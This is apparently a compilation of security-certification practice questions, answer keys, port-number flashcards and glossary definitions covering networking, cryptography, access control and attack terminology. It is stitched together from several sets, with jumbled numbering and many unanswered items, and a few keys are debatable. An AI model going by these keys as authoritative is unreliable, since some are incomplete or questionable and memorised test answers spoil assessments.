. Answer: A. True Explanation: A replay attack occurs when an attacker intercepts user credentials and tries to use this information later for gaining unauthorized access to resources on a network.

26. Which IPsec mode provides whole packet encryption? A. Tunnel B. Payload C. Transport D. Host-to-host

. Answer: A. Tunnel Explanation: IPsec can be implemented in a host-to-host transport mode (where only the payload of the IP packet is usually encrypted and/or authenticated) or in a network tunnel mode (where the entire IP packet is encrypted and/or authenticated).

18. Gaining unauthorized access to a Bluetooth device is referred to as: A. Xmas attack B. Bluesnarfing C. Bluejacking D. Pharming

. Answer: B. Bluesnarfing Explanation: Gaining unauthorized access to a Bluetooth device is referred to as bluesnarfing.

36. Steganography allows for: A. Checking data integrity B. Calculating hash values C. Hiding data within another piece of data D. Data encryption

. Answer: C. Hiding data within another piece of data Explanation: Steganography allows for hiding data within another piece of data.

POP3 - Post Office Protocol version 3 uses what port(s)?

110

NNTP - Network News Transfer Protocol uses what port(s)?

119

IMAP4 - Internet message access protocol version 4 uses what port(s)?

143

SNMP - Simple Network Management Protocol uses what port(s)?

161

SNMP Trap - Simple Network Management Protocol Trap uses what port(s)?

162

L2TP - Layer 2 Tunneling Protocol uses what port(s)?

1701

PPTP - Point-to-Point Tunneling Protocol uses what port(s)?

1723

FTP - File Transport Protocol uses what port(s)?

20, 21

SCP - Secure Copy (uses SSH) uses what port(s)?

SFTP - Secure File Transport Protocol (uses SSH) uses what port(s)?

SSH - Secure Shell uses what port(s)?

Telnet uses what port(s)?

SMTP - Simple Mail Transport Protocol uses what port(s)?

RDP - Remote Desktop Protocol uses what port(s)?

3389

LDAP - Lightweight Directory Access Protocol uses what port(s)?

389

HTTPS - Hypertext Transfer Protocol Secure uses what port(s)?

443

SSL VPN - Secure Sockets Layer virtual private network uses what port(s)?

443

TACACS - Terminal Access Controller Access-Control System uses what port(s)?

ISAKMP (VPN) - Internet Security Association and Key Management Protocol (virtual private network) uses what port(s)?

500

Syslog uses what port(s)?

514

DNS - Domain Name System uses what port(s)?

DHCP - Dynamic Host Configuration Protocol uses what port(s)?

67, 68

TFTP - Trivial File Transport Protocol uses what port(s)?

HTTP - Hypertext Transfer Protocol uses what port(s)?

Kerberos uses what port(s)?

22. An active/passive configuration has an impact on: a. Confidentiality b. Integrity c. Availability d. Non-Repudiation

61. Security administrators attempted corrective action after a phishing attack. Users are still experiencing trouble logging in, as well as an increase in account lockouts. User's email contacts are complaining of an increase in spam and social networking requests. Due to the large number of affected accounts, remediation must be accomplished quickly. Which of the following actions should be taken first? Choose two. a. Disable the compromised accounts b. Update WAF rules to block social networks c. Remove the compromised accounts from all AD groups d. Change the compromised accounts' passwords e. Disable open relay on the email server f. Enable sender policy framework

A,C

24. A security administrator is developing controls for creating audit trails if a PHI data breach is to occur. The administrator has been given the following requirements: All access must be correlated to a user account All user accounts must be assigned to a single individual User access to the PHI data must be recorded Anomalies in PHI data access must be reported Logs and Records cannot be deleted or modified Which of the following should the administrator implement to meet the above requirements? (Select three) a. Eliminate shared accounts b. Create a standard naming convention for accounts c. Implement usage auditing and review d. Enable account lockout thresholds e. Copy logs in real time to a secured WORM drive f. Implement time of day restrictions g. Perform regular permission audits and reviews

A,C,E

58. An organization is expanding its network team. Currently, it has local accounts on all network devices, but with growth, it wants to move to centrally managed authentication. Which of the following are the best solutions for the organization? Select two. a. TACACS+ b. CHAP c. LDAP d. RADIUS e. MSCHAPv2

A,D

AUP

Acceptable use policy. An AUP defines proper system usage. It will often describe the purpose of computer systems and networks, how users can access them, and the responsibilities of users when accessing the systems.

ACE

Access Control Entry. Identifies a user or group that is granted permission to a resource. ACEs are contained within a DACL in NTFS.

ACL

Access control list. A list of rules used to grant access to a resource. In NTFS, a list of ACEs makes up the ACL for a resource. In a firewall, an ACL identifies traffic that is allowed or blocked based on IP addresses, networks, ports, and some protocols (using the protocol ID).

Access point, short for wireless access point (WAP). APs provide access to a wired network to wireless clients. Many APs support isolation mode to segment wireless uses from other wireless users.

ARP

Address Resolution Protocol. Resolves IP addresses to MAC addresses. ARP poisoning attacks can redirect traffic through an attacker's system by sending false MAC address updates. VLAN segregation helps prevent the scope of ARP poisoning attacks within a network.

AES256

Advanced Encryption Standard 256 bit. AES sometimes includes the number of bits used in the encryption keys and AES256 uses 256-bit encryption keys.

AES

Advanced Encryption Standard. A symmetric algorithm used to encrypt data and provide confidentiality. AES is quick, highly secure, and used in a wide assortment of cryptography schemes. It includes key sizes of 128 bits, 192 bits, or 256 bits.

RSA

An asymmetric algorithm used to encrypt data and digitally sign transmissions. It is named after its creators, Rivest, Shamir, and Adleman, and RSA is also the name of the company they founded together. RSA relies on the mathematical properties of prime numbers when creating public and private keys.

ALE

Annualized loss expectancy. Used to measure risk with annualized rate of occurrence (ARO) and single loss expectancy (SLE). The ALE identifies the total amount of loss expected for a given risk. The calculation is SLE x ARO = ALE.

ARO

Annualized rate of occurrence. Used to measure risk with annualized loss expectancy (ALE) and single loss expectancy (SLE). The ARO identifies how many times a loss is expected to occur in a year. The calculation is SLE x ARO = ALE.

66. A set of physical characteristics of the human body that can be used for identification and access control purposes is known as: A. Biometrics B. PII C. Physical token D. ID

Answer: A. Biometrics Explanation: In computer security, biometrics refers to physical characteristics of the human body that can be used for identification and access control purposes.

17. The practice of sending unsolicited messages over Bluetooth is known as: A. Bluejacking B. Vishing C. Bluesnarfing D. Phishing

Answer: A. Bluejacking Explanation: Sending unsolicited messages over Bluetooth is known as bluejacking.

97. AES-based encryption mode implemented in WPA2 is known as: A. CCMP B. 3DES C. TKIP D. HMAC

Answer: A. CCMP Explanation: Counter Mode Cipher Block Chaining Message Authentication Code Protocol (CCMP) is an encryption mode implemented in the Wi-Fi Protected Access II (WPA2) security protocol. CCMP relies on the Advanced Encryption Standard (AES) providing much stronger security than the Wired Equivalent Privacy (WEP) protocol and Temporal Key Integrity Protocol (TKIP) implemented in Wi-Fi Protected Access (WPA).

43. An operating system security feature that ensures safe memory usage by applications is known as: A. DEP B. DLP C. DSU D. DRP

Answer: A. DEP Explanation: Data Execution Prevention (DEP) is a security feature in modern operating systems that monitors applications to make sure they use system memory safely. In Microsoft environment, DEP is defined as a set of hardware and software technologies that perform additional checks on memory to help protect against malicious code exploits. If a program tries to execute code from memory in an incorrect way, DEP closes the program.

24. Which of the terms listed below refers to a situation where no alarm is raised when an attack has taken place? A. False negative B. True positive C. False positive D. True negative

Answer: A. False negative Explanation: A situation where no alarm is raised when an attack has taken place is an example of a false negative error.

19. Which of the following best describes an important security advantage yielded by implementing vendor diversity? a. Sustainability b. Homogeneity c. Resiliency d. Configurability

92. In computer security, the term dumpster diving is used to describe a practice of sifting through trash for discarded documents containing sensitive data. Found documents containing names and surnames of the employees along with the information about positions held in the company and other data can be used to facilitate social engineering attacks. Having the documents shredded or incinerated before disposal makes dumpster diving less effective and also mitigates the risk of social engineering attacks. A. True B. False

Answer: A. True Explanation: In computer security, the term dumpster diving is used to describe a practice of sifting through trash for discarded documents containing sensitive data. Found documents containing names and surnames of the employees along with the information about positions held in the company and other data can be used to facilitate social engineering attacks. Having the documents shredded or incinerated before disposal makes dumpster diving less effective and also mitigates the risk of social engineering attacks.

33. Network Access Control (NAC) defines a set of rules enforced in a network that the clients attempting to access the network must comply with. With NAC, policies can be enforced before or after end-stations gain access to the network. NAC can be implemented as Pre-admission NAC where a host must, for example, be virus free or have patches applied before it can be allowed to connect to the network, and/or Post-admission NAC, where a host is being granted/denied permissions based on its actions after it has been provided with the access to the network. A. True B. False

Answer: A. True Explanation: Network Access Control (NAC) defines a set of rules enforced in a network that the clients attempting to access the network must comply with. With NAC, policies can be enforced before or after end-stations gain access to the network. NAC can be implemented as Pre-admission NAC where a host must, for example, be virus free or have patches applied before it can be allowed to connect to the network, and/or Post-admission NAC, where a host is being granted/denied permissions based on its actions after it has been provided with the access to the network.

77. One of the goals behind the mandatory vacations policy is to mitigate the occurrence of fraudulent activity within the company. A. True B. False

Answer: A. True Explanation: One of the goals behind the mandatory vacations policy is to mitigate the occurrence of fraudulent activity within the company.

54. Which of the answers listed below refers to a firmware interface designed as a replacement for BIOS? A. UEFI B. ACPI C. CMOS D. USMT

Answer: A. UEFI Explanation: Unified Extensible Firmware Interface (UEFI) is a firmware interface designed as a replacement for BIOS. UEFI offers a variety of improvements over BIOS including Graphical User Interface (GUI), mouse support, network access capability, or security boot functionality designed to prevent the loading of malware and unauthorized operating systems during the computer start-up process.

83. A type of risk assessment formula defining probable financial loss due to a risk over a one-year period is known as: A. ARO B. ALE C. SLE D. BPA

Answer: B. ALE Explanation: Annual Loss Expectancy (ALE) risk assessment formula defines probable financial loss due to a risk over a one-year period.

80. Which of the following acronyms refers to a set of rules enforced in a network that restrict the use to which the network may be put? A. OEM B. AUP C. UAT D. ARO

Answer: B. AUP Explanation: Acceptable Use Policy (AUP) is a set of rules enforced in a network that restrict the use to which the network may be put.

45. Which of the following acronyms refers to a policy of permitting employees to bring personally owned mobile devices and to use those devices for accessing privileged company information and applications? A. BSOD B. BYOD C. JBOD D. BYOB

Answer: B. BYOD Explanation: The term Bring Your Own Device (BYOD) refers to a policy of permitting employees to bring personally owned mobile devices and to use those devices for accessing privileged company information and applications.

38. The practice of connecting to an open port on a remote server to gather more information about the service running on that port is referred to as: A. Bluejacking B. Banner grabbing C. Session hijacking D. eDiscovery

Answer: B. Banner grabbing Explanation: The practice of connecting to an open port on a remote server to gather more information about the service running on that port is referred to as banner grabbing.

88. In incident response procedures a process that ensures proper handling of collected evidence is called: A. Intrusion detection/notification B. Chain of custody C. MSDS documentation D. Equipment grounding

Answer: B. Chain of custody Explanation: In incident response procedures a process that ensures proper handling of collected evidence is called chain of custody.

79. A sticky note with a password kept on sight in user's cubicle would be a violation of which of the following policies? A. Data labeling policy B. Clean desk policy C. User account policy D. Password complexity

Answer: B. Clean desk policy Explanation: A sticky note with a password kept on sight in user's cubicle would be a violation of clean desk policy.

32. A software or hardware based security solutions designed to detect and prevent unauthorized use and transmission of confidential information outside of a corporate network are referred to as: A. AUP B. DLP C. UAT D. LTO

Answer: B. DLP Explanation: Data Loss Prevention (DLP) solutions are software or hardware based security solutions designed to detect and prevent unauthorized use and transmission of confidential information outside of a corporate network.

90. A cold site is the most expensive type of backup site for an organization to operate. A. True B. False

Answer: B. False Explanation: A cold site is the least expensive type of backup site for an organization to operate. It is a type of an alternate site that offers only the basic facilities, which means that in case of emergency all the equipment and data must be moved to the site first to make it operational.

23. An antivirus software identifying non-malicious code as a virus due to faulty virus signature file is an example of: A. Fault tolerance B. False positive error C. Incident isolation D. False negative error

Answer: B. False positive error Explanation: An antivirus software identifying non-malicious code as a virus due to faulty virus signature file is an example of a false positive error.

2. When is the first stage of symmetric encryption? a. Encrypt data using your Public Key b. Establish digital signatures c. Exchange encryption keys d. Install digital certificates

47. A type of protocol used in network management systems to monitor network-attached devices is known as: A. SIP B. SNMP C. NetBIOS D. RTP

Answer: B. SNMP Explanation: Simple Network Management Protocol (SNMP) is a UDP-based, Application Layer protocol used in network management systems to monitor network-attached devices. SNMP is typically integrated into most modern network infrastructure devices such as routers, bridges, switches, servers, printers, copiers, fax machines, and other network-attached devices. An SNMP-managed network consists of three key components: a managed device, a network-management software module that resides on a managed device (Agent), and a network management system (NMS) which executes applications that monitor and control managed devices and collect SNMP information from Agents. All SNMP-compliant devices include a virtual database called Management Information Base (MIB) containing information about configuration and state of the device that can be queried by the SNMP management station.

62. A cloud computing infrastructure type where applications are hosted over a network (typically Internet) eliminating the need to install and run the software on the customer's own computers is known as: A. Thick client B. SaaS C. Virtualization D. IaaS

Answer: B. SaaS Explanation: Software as a Service (SaaS) is a type of cloud computing infrastructure where applications are hosted over a network (typically Internet) eliminating the need to install and run the software on the customer's own computers which simplifies maintenance and support. Compared to conventional software deployment which requires licensing fee and often investment in additional hardware on the client side, SaaS can be delivered at a lower cost by providing remote access to applications and pricing based on monthly or annual subscription fee.

7. Phishing scams targeting selected individuals/groups of users are referred to as: A. Vishing B. Spear phishing C. MITM attack D. Whaling

Answer: B. Spear phishing Explanation: Phishing scams targeting selected individuals/groups of users are referred to as spear phishing.

96. Which of the following wireless encryption schemes offers the highest level of protection? A. WEP B. WPA2 C. WAP D. WPA

Answer: B. WPA2 Explanation: Wi-Fi Protected Access (WPA) and Wired Equivalent Privacy (WEP) are encryption standards designed for securing wireless networks. WEP is an older standard and due to its vulnerabilities is not recommended. WPA was designed as an interim replacement for WEP, and WPA2 was introduced as the official standard offering the strongest security of the three.

16. Which of the following technologies simplifies configuration of new wireless networks by providing non-technical users with a capability to easily configure network security settings and add new devices to an existing network? A. WPA B. WPS C. WEP D. WAP

Answer: B. WPS Explanation: Wi-Fi Protected Setup (WPS) is a network security standard which simplifies configuration of new wireless networks by providing non-technical users with a capability to easily configure network security settings and add new devices to an existing network. WPS has known vulnerabilities and disabling this functionality is one of the recommended ways of securing the network.

39. What is the name of a command-line utility used for checking the reachability of a remote host? A. tracert B. ping C. nslookup D. netstat

Answer: B. ping Explanation: Command-line utility used for checking the reachability of a remote host is called ping. Ping operates by sending Internet Control Message Protocol (ICMP) echo request packets to the destination host and waiting for a reply.

84. In quantitative risk assessment, this formula is used for estimating the likelihood of occurrence of a future threat. A. ALE B. SLA C. ARO D. SLE

Answer: C. ARO Explanation: Annualized Rate of Occurrence (ARO) formula is an estimate based on the historical data of how often a threat would be successful in exploiting a vulnerability. In quantitative risk assessment, this term is used for estimating the likelihood of occurrence of a future threat.

11. A type of exploit that relies on overwriting contents of memory to cause unpredictable results in an application is called: A. IV attack B. SQL injection C. Buffer overflow D. Fuzz test

Answer: C. Buffer overflow Explanation: Buffer overflow is a type of exploit that relies on overwriting contents of memory to cause unpredictable results in an application.

71. A type of access control in computer security where every object has an owner who at his/her own discretion determines what kind of permissions other users can have to that object is known as: A. MAC B. ABAC C. DAC D. RBAC

Answer: C. DAC Explanation: In Discretionary Access Control (DAC) model every object has an owner who at his/her own discretion determines what kind of permissions other users can have to that object. DAC is also referred to as an access control method based on user identity.

35. What is the most effective way for permanent removal of data stored on a magnetic drive? A. Quick format B. Recycle bin C. Degaussing D. Low-level format

Answer: C. Degaussing Explanation: Degaussing provides the most effective way for permanent removal of data stored on a magnetic drive.

15. Which of the following terms refers to a rogue AP? A. Computer worm B. Backdoor C. Evil twin D. Trojan horse

Answer: C. Evil twin Explanation: An access point (AP) deployed by a hacker in order to steal user credentials or for the purpose of traffic eavesdropping is commonly referred to as rogue access point or evil twin.

72. Which of the following is an example of a biometric authentication? A. Password B. Smart card C. Fingerprint scanner D. User name

Answer: C. Fingerprint scanner Explanation: In computer security, user's identity can be verified either by examining something that the user knows (a user name or password), something that the user has (a physical object such as smart card), or something that the user is (unique trait of every single person such as finger print or pattern of a human eye iris). Biometric authentication systems are based on examining the unique traits of a user and fingerprint scanner is an example of a biometric device.

37. A monitored host or network specifically designed to detect unauthorized access attempts is known as: A. Botnet B. Rogue access point C. Honeypot D. Flood guard

Answer: C. Honeypot Explanation: A monitored host or network specifically designed to detect unauthorized access attempts is known as a honeypot. This type of system contains no valuable data and is used to divert the attacker's attention from the corporate network. Multiple honeypots set up on a network are known as a honeynet.

30. A network access control method whereby the 48-bit address assigned to each network card is used to determine access to the network is known as: A. EMI shielding B. Hardware lock C. MAC filter D. Quality of Service (QoS)

Answer: C. MAC filter Explanation: Network Access Control (NAC) method based on the physical address (MAC address) of the Network Interface Card (NIC) is called MAC filtering or MAC address filtering. 48-bit MAC address is a unique number assigned to every network adapter. Devices acting as network access points can have certain MAC addresses blacklisted or whitelisted and based on the entry on either of the lists grant or deny access to the network.

50. Which of the following solutions is used to hide the internal IP addresses by modifying IP address information in IP packet headers while in transit across a traffic routing device? A. NAC B. ACL C. NAT D. DMZ

Answer: C. NAT Explanation: Network Address Translation (NAT) is a technology that provides an IP proxy between a private Local Area Network (LAN) and a public network such as the Internet. Computers on the private LAN can access the Internet through a NAT-capable router which handles the IP address translation. NAT hides the internal IP addresses by modifying IP address information in IP packet headers while in transit across a traffic routing device.

64. Which of the following cloud services would provide the best solution for a web developer intending to create a web app? A. SaaS B. API C. PaaS D. IaaS

Answer: C. PaaS Explanation: Platform as a Service (PaaS) is a category of cloud computing services providing cloud-based application development tools, in addition to services for testing, deploying, collaborating on, hosting, and maintaining applications.

4. A collection of software tools used by a hacker to mask intrusion and obtain administrator-level access to a computer or computer network is known as: A. Backdoor B. Botnet C. Rootkit D. Armored virus

Answer: C. Rootkit Explanation: The term rootkit refers to a collection of software tools used by a hacker to mask intrusion and obtain administrator-level access to a computer or computer network.

31. Which of the acronyms listed below refers to a technology that allows for real-time analysis of security alerts generated by network hardware and applications? A. LACP B. DSCP C. SIEM D. LWAPP

Answer: C. SIEM Explanation: Security Information and Event Management (SIEM) solutions are used for real-time analysis of security alerts generated by network hardware and applications.

74. An agreement between a service provider and the user(s) defining the nature, availability, quality, and scope of the service to be provided is known as: A. BPA B. MoU C. SLA D. ISA

Answer: C. SLA Explanation: An agreement between a service provider and the user(s) defining the nature, availability, quality, and scope of the service to be provided is known as Service Level Agreement (SLA).

28. A protocol that provides protection against switching loops is called: A. UTP B. SSH C. STP D. HMAC

Answer: C. STP Explanation: Spanning Tree Protocol (STP) is used to prevent switching loops. Switching loop occurs when there's more than one active link between two network switches, or when two ports on the same switch become connected to each other.

27. Which type of IDS relies on known attack patterns in order to detect an intrusion? A. Behavior-based B. Heuristic/behavioral C. Signature-based D. AD-IDS

Answer: C. Signature-based Explanation: Signature-based Intrusion Detection System is a type of IDS that relies on known attack patterns in order to detect intrusions.

3. What is adware? A. Unsolicited or undesired electronic messages B. Malicious program that sends copies of itself to other computers on the network C. Software that displays advertisements D. Malicious software that collects information about users without their knowledge

Answer: C. Software that displays advertisements Explanation: Adware is a type of software that displays advertisements on the user system, often in the form of a pop-up window. Unsolicited or undesired electronic messages are known as spam. Malicious program that sends copies of itself to other computers on the network is called a computer worm (or simply a worm). Malicious software that collects information about users without their knowledge is referred to as spyware.

44. Which of the terms listed below refers to a mobile device's capability to share its Internet connection with other devices? A. Pairing B. Clustering C. Tethering D. Bonding

Answer: C. Tethering Explanation: The term tethering refers to a mobile device's capability to share its Internet connection with other devices.

53. What is the name of a technology that allows for storing passwords, certificates, or encryption keys in a hardware chip? A. Encrypting File System (EFS) B. Triple Digital Encryption Standard (3DES) C. Trusted Platform Module (TPM) D. Advanced Encryption Standard (AES)

Answer: C. Trusted Platform Module (TPM) Explanation: The Trusted Platform Module (TPM) is a specification, published by the Trusted Computing Group (TCG), for a microcontroller that can store secured information, and also the general name of implementations of that specification. Trusted Platform Modules are hardware based security microcontrollers that store keys, passwords and digital certificates and protect this data from external software attacks and physical theft. TPMs are usually embedded on the motherboard of a personal computer or laptop, but they can also be used in other devices such as mobile phones or network equipment. The nature of hardware-based cryptography ensures that the information stored in hardware is better protected from external attacks executed with the use of software.

14. URL hijacking is also referred to as: A. Session hijacking B. Sandboxing C. Typo squatting D. Shoulder surfing

Answer: C. Typo squatting Explanation: URL hijacking is also known as typo squatting. The term refers to a practice of registering misspelled domain name closely resembling other well established and popular domain name in hopes of getting Internet traffic from users who would make errors while typing in the web address in their browsers.

42. Which of the following acronyms refers to a network security solution combining the functionality of a firewall with additional safeguards such as URL filtering, content inspection, or malware inspection? A. MTU B. STP C. UTM D. XML

Answer: C. UTM Explanation: The term Unified Threat Management (UTM) refers to a network security solution (commonly in the form of a dedicated device called UTM appliance) which combines the functionality of a firewall with additional safeguards such as for example URL filtering, spam filtering, gateway antivirus protection, intrusion detection or prevention, content inspection, or malware inspection.

9. An email message containing a warning related to a non-existent computer security threat, asking a user to delete system files falsely identified as malware, and/or prompting them to share the message with others would be an example of: A. Vishing B. Impersonation C. Virus hoax D. Phishing

Answer: C. Virus hoax Explanation: An email message containing a warning related to a non-existent computer security threat, asking a user to delete system files falsely identified as malware, and/or prompting them to share the message with others would be an example of a virus hoax.

12. Zero-day attack exploits: A. New accounts B. Patched software C. Vulnerability that is present in already released software but unknown to the software developer D. Well known vulnerability

Answer: C. Vulnerability that is present in already released software but unknown to the software developer Explanation: Zero-day attacks exploit vulnerabilities that are present in already released software but unknown to the software developer.

21. A penetration test conducted with the use of prior knowledge on how the system that is to be tested works is known as: A. White hat B. Sandbox C. White box D. Black box

Answer: C. White box Explanation: A penetration test conducted with the use of prior knowledge on how the system that is to be tested works is known as white box testing.

25. Which of the following answers refers to a set of rules that specify which users or system processes are granted access to objects as well as what operations are allowed on a given object? A. CRL B. NAT C. BCP D. ACL

Answer: D. ACL Explanation: An Access Control List (ACL) contains a set of rules that specify which users or system processes are granted access to objects as well as what operations are allowed on a given object.

73. Which of the following answers refers to a key document governing the relationship between two business organizations? A. ISA B. SLA C. MoU D. BPA

Answer: D. BPA Explanation: Business Partners Agreement (BPA) is a key document governing the relationship between two business organizations.

6. Which of the following answers refers to an undocumented way of gaining access to a program, online service, or an entire computer system? A. Tailgating B. Rootkit C. Trojan horse D. Backdoor

Answer: D. Backdoor Explanation: The term backdoor refers to an undocumented way of gaining access to a program, online service, or an entire computer system.

98. Which of the answers listed below refers to a security solution allowing administrators to block Internet access for users until they perform required action? A. Access logs B. Mantrap C. Post-admission NAC D. Captive portal

Answer: D. Captive portal Explanation: Captive portals allow administrators to block Internet access for users until they perform required action. An example captive portal could be a web page requiring authentication and/or payment (e.g. at a public Wi-Fi hotpot) before a user is allowed to proceed and use the Internet access service.

10. Which of the following attacks uses multiple compromised computer systems against its target? A. Spear phishing B. DoS C. Watering hole attack D. DDoS

Answer: D. DDoS Explanation: As opposed to the simple Denial of Service (DoS) attacks that usually are performed from a single system, a Distributed Denial of Service (DDoS) attack uses multiple compromised computer systems to perform an attack against its target. The intermediary systems that are used as platform for the attack are the secondary victims of the DDoS attack; they are often referred to as zombies, and collectively as a botnet. The goal of DoS and DDoS attacks is to flood the bandwidth or resources of a targeted system so that it becomes overwhelmed with false requests and in result doesn't have time or resources to handle legitimate requests.

49. A lightly protected subnet consisting of publicly available servers placed on the outside of the company's firewall is known as: A. VPN B. Access Point (AP) C. VLAN D. DMZ

Answer: D. DMZ Explanation: In the context of computer security, the term Demilitarized Zone (DMZ) refers to a lightly protected subnet consisting of publicly available servers placed on the outside of the company's firewall.

60. The practice of finding vulnerabilities in an application by feeding it incorrect input is referred to as: A. Patching B. Exception handling C. Application hardening D. Fuzzing

Answer: D. Fuzzing Explanation: Finding vulnerability in an application by feeding it incorrect input is known as fuzzing, or fuzz test.

8. What is tailgating? A. Looking over someone's shoulder to get information B. Scanning for unsecured wireless networks while driving in a car C. Manipulating a user into disclosing confidential information D. Gaining unauthorized access to restricted areas by following another person

Answer: D. Gaining unauthorized access to restricted areas by following another person Explanation: The practice of gaining unauthorized access to restricted areas by following another person is called tailgating. Looking over someone's shoulder to get information is known shoulder surfing. The term war driving refers to scanning for unsecured wireless networks while driving in a car. Manipulating/deceiving users into disclosing confidential information is known as social engineering.

41. Which of the terms listed below refers to a security solution implemented on an individual computer host monitoring that specific system for malicious activities or policy violations? A. NIPS B. Content filter C. Firewall D. HIDS

Answer: D. HIDS Explanation: Host Based Intrusion Detection System (HIDS) is a security application designed to monitor and analyze the local computer system for malicious or anomalous activity. Common examples of HIDS are antivirus software and anti-spyware applications.

59. Which of the following solutions is used for controlling temperature and humidity? A. Faraday cage B. UART C. EMI shielding D. HVAC

Answer: D. HVAC Explanation: Heating, Ventilation, and Air Conditioning (HVAC) systems are used for controlling temperature and humidity.

70. An access control model in which every resource has a sensitivity label matching clearance level assigned to a user is called: A. RBAC B. DAC C. HMAC D. MAC

Answer: D. MAC Explanation: Mandatory Access Control (MAC) is an access control model where every resource has a sensitivity label matching a clearance level assigned to a user (to be able to access the resource, user's clearance level must be equal or higher than the sensitivity level assigned to the resource). With mandatory access control users cannot set or change access policies at their own discretion; labels and clearance levels can only be applied and changed by an administrator.

91. Restoring data from an incremental backup requires: (Select 2 answers) A. Copy of the last incremental backup B. All copies of differential backups made since the last full backup C. Copy of the last differential backup D. All copies of incremental backups made since the last full backup E. Copy of the last full backup

Answers: D and E. All copies of incremental backups made since the last full backup and Copy of the last full backup Explanation: Restoring data from an incremental backup requires a copy of the last full backup as well as all copies of incremental backups made since the last full backup.

Authentication Header. IPsec includes both AH and ESP. AH provides authentication and integrity, and ESP provides confidentiality, integrity, and authentication. AH is identified with protocol ID number 51.

AAA

Authentication, Authorization, and Accounting. AAA protocols are used in remote access systems. For example, TACACS+ is an AAA protocol that uses multiple challenges and responses during a session. Authentication verifies a user's identification. Authorization determines if a user should have access. Accounting tracks a user's access with logs.

1. You must authenticate with a unique username and password before being able to associate with the wireless access points. Which of the following wireless features would be most appropriate to achieve this objective? a. WPA b. WPA2 PSK c. WPA2-CCMP d. WPS

11. An organization requires users to provide their fingerprints to access an application. To improve security, the application developers intend to implement multifactor authentication. Which of the following should be implemented? a. Use a camera for facial recognition b. Have users sign their name naturally c. Require a palm geometry scan d. Implement iris recognition

14. A security analyst is mitigating a pass-the-hash vulnerability on a Windows infrastructure. Given the requirement, which of the following should the security analyst do to minimize the risk? a. Enable CHAP b. Disable NTLM c. Enable Kerberos d. Disable PAP

20. Which of the following refers to the term to restore a system to its operational state? a. MTBF b. MTTR c. RTO d. RPO

25. A security administrator receives an alert from a third party vendor that indicates a certificate that was installed in the browser has been hijacked at the root of a small public CA. The security administrator knows there are at least four thousand different browsers in use on more than a thousand computers in the domain worldwide. Which of the following solutions would be best for the security administrator to implement to most efficiently assist with this issue? a. SSL b. CRL c. PKI d. ACL

29. A systems administrator wants to provide balance between the security of a wireless network and usability. The administrator is concerned with wireless encryption compatibility of older devices used by some employees. Which of the following would provide strong security and backward compatibility when accessing the wireless network? a. Open wireless network and SSL VPN b. WPA using a preshared key c. WPA2 using a RADIUS back end for 802.1x authentication d. WEP with a 40 bit key

33. A company is looking for an authentication protocol that uses tickets and time stamps to ensure the validity and prevent against replay attacks. Which of the following would be best suited to meet this requirement? a. TACACS+ b. Kerberos c. RADIUS d. MSCHAP

5. A security administrator installed a new network scanner that identifies new host systems on the network. Which of the following did the security administrator install? a. Vulnerability scanner b. Network based IDS c. Rogue System detection d. Configuration compliance scanner

75. An analyst receives an alert from the SIEM showing an IP Address that does not belong to the assigned network can be seen sending packets to the wrong gateway. Which of the following network devices is misconfigured and which of the following should be done to remediate the issue? a. Firewall, implement an ACL on the interface b. Router, place the correct subnet on the interface c. Switch, modify the access port to trunk port d. Proxy, add the correct transparent interface

62. A security administrator has written a script that will automatically upload binary and text based configuration files onto a remote server using a scheduled task. The configuration files contain sensitive information. Which of the following should the administrator use? Choose two. a. TOTP b. SCP c. FTP over a nonstandard port d. SRTP e. Certificate based authentication f. SNMPv3

B,E

BIOS

Basic Input/Output System. A computer's firmware used to manipulate different settings such as the date and time, boot drive, and access password.

BCP

Business continuity plan. A plan that helps an organization predict and plan for potential outages of critical services or functions. It includes disaster recovery elements that provide the steps used to return critical functions to operation after an outage. A BIA is a part of a BCP and the BIA drives decisions to create redundancies such as failover clusters or alternate sites.

BIA

Business impact analysis. The BIA identifies critical business or mission requirements and includes elements such as Recovery Time Objectives (RTOs) and Recovery Point Objectives (RPOs), but it doesn't identify solutions.

10. Users in a corporation currently authenticate with a username and password. A security administrator wishes to implement two-factor authentication to improve security. Which of the following authentication methods should be deployed to achieve this goal? a. PIN b. Security question c. Smart Card d. Passphrase e. CAPTCHA

15. Due to regulatory requirements, servers in a global organization must use time synchronization. Which of the following represents the most secure method of time synchronization? a. The servers should connect to external Stratum 0 NTP servers for synchronization b. The servers should connect to internal Stratum 0 NTP servers for synchronization c. The servers should connect to external Stratum 1 NTP servers for synchronization d. The servers should connect to internal Stratum 1 NTP servers for synchronization

17. A security specialist must confirm file backups match the original copy. Which of the following should th3e security specialist use to accomplish the objective? a. AES b. 3DES c. MD5 d. RSA

QUESTION 109A company stores highly sensitive data files used by the accounting system on a server file share. Theaccounting system uses a service account named accounting-svc to access the file share. The data is protected will a full disk encryption, and the permissions are set as follows: File system permissions: Users = Read OnlyShare permission: accounting-svc = Read OnlyGiven the listed protections are in place and unchanged, to which of the following risks is the data still subject? A. Exploitation of local console access and removal of data B. Theft of physical hard drives and a breach of confidentiality C. Remote exfiltration of data using domain credentials D. Disclosure of sensitive data to third parties due to excessive share permissions

Correct Answer: A

QUESTION 111Joe, a salesman, was assigned to a new project that requires him to travel to a client site. While waiting for aflight, Joe decides to connect to the airport wireless network without connecting to a VPN, and then sendsconfidential emails to fellow colleagues. A few days later, the company experiences a data breach. Uponinvestigation, the company learns Joe's emails were intercepted. Which of the following MOST likely caused the data breach? A. Policy violation B. Social engineering C. Insider threat D. Zero-day attack

Correct Answer: A

QUESTION 130A senior incident response manager receives a call about some external IPs communicating with internal computers during off-hours. Which of the following types of malware is MOST likely causing this issue? A. Botnet B. Ransomware C. Polymorphic malware D. Armored virus

Correct Answer: A

QUESTION 138Which of the following allows an auditor to test proprietary-software compiled code for security flaws? A. Fuzzing B. Static review C. Code signing D. Regression testing

Correct Answer: A

QUESTION 13A user typically works remotely over the holidays using a web-based VPN to access corporate resources. Theuser reports getting untrusted host errors and being unable to connect. Which of the following is MOST likelythe case?A. The certificate has expiredB. The browser does not support SSLC. The user's account is locked outD. The VPN software has reached the seat license maximum

Correct Answer: A

QUESTION 145 A user receives an email from ISP indicating malicious traffic coming from the user's home network is detected. The traffic appears to be Linux-based, and it is targeting a website that was recently featured on the news as being taken offline by an Internet attack. The only Linux device on the network is a home surveillance camera system. Which of the following BEST describes what is happening? A. The camera system is infected with a bot. B. The camera system is infected with a RAT. C. The camera system is infected with a Trojan. D. The camera system is infected with a backdoor.

Correct Answer: A

